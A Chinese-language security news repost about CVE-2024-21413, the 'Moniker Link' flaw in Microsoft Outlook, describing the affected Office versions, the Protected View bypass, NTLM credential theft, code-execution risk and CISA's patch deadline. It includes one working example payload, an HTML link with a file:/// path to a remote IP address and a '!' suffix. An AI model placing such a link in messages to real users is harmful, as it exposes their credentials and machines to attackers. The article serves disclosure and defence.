CVE-2024-21413 (CVSS 9.8)：严重 Outlook 漏洞正受到主动攻击，PoC 可用

Microsoft Outlook 中一个严重漏洞（编号为 CVE-2024-21413）正在被广泛利用，对全球组织构成重大威胁。该漏洞的 CVSS 评分为 9.8（满分 10 分），攻击者只需打开恶意电子邮件即可远程执行任意代码。

该漏洞由 Check Point 安全研究员 Haifei Li 发现，影响多个版本的 Microsoft Office，包括 Office 2016、2019、LTSC 2021 和 Microsoft 365 Enterprise 应用程序。该漏洞存在于 Outlook 在处理包含恶意链接的电子邮件时输入验证不当。至关重要的是，它允许攻击者绕过受保护的视图（旨在以只读模式打开 Office 文件的安全功能），而是以完全编辑模式打开恶意文档。

该漏洞被 Check Point 称为“Moniker Link”，利用了 Outlook 处理 file:// 协议链接时的一个漏洞。通过在 URL 中的文件扩展名后添加感叹号和任意文本（例如）

<a href=”file:///\10.10.111.111testtest.rtf!something”>CLICK ME</a>

攻击者可以绕过 Outlook 的安全限制。这允许客户端访问远程资源而不会触发警告，从而为恶意负载打开大门。Check Point 确认了该漏洞在最新的 Windows 10/11 和 Microsoft 365（Office 2021）环境中的有效性，这表明其他 Office 版本可能也受到影响。他们认为这是 Windows/COM 生态系统中长期存在的问题，存在于核心 COM API 中。

成功利用该漏洞的影响非常严重，包括窃取 NTLM 凭据信息以及通过恶意制作的 Office 文档执行任意代码。这可能使攻击者能够完全控制受害者的计算机、窃取敏感数据、部署勒索软件或执行其他恶意活动。

美国网络安全和基础设施安全局 (CISA) 已发出警告，要求美国联邦机构在 2 月 27 日之前修补其系统，以防此漏洞被积极利用。鉴于漏洞的严重性和持续的攻击，尚未更新 Outlook 版本的组织面临巨大风险。

尽管微软最初否认CVE-2024-21413 在零日攻击中被利用，但最近的报告表明威胁行为者正在积极滥用该漏洞。GitHub 上已发布了一个概念验证 (PoC) 漏洞，这进一步增加了大规模攻击的风险。

Check Point 强烈建议所有 Outlook 用户尽快应用官方 Microsoft 补丁。此关键更新对于防范此被积极利用的漏洞并防止潜在的灾难性后果至关重要。不要等待 - 立即修补！

原文始发于微信公众号（Ots安全）：CVE-2024-21413 (CVSS 9.8)：严重 Outlook 漏洞正受到主动攻击，PoC 可用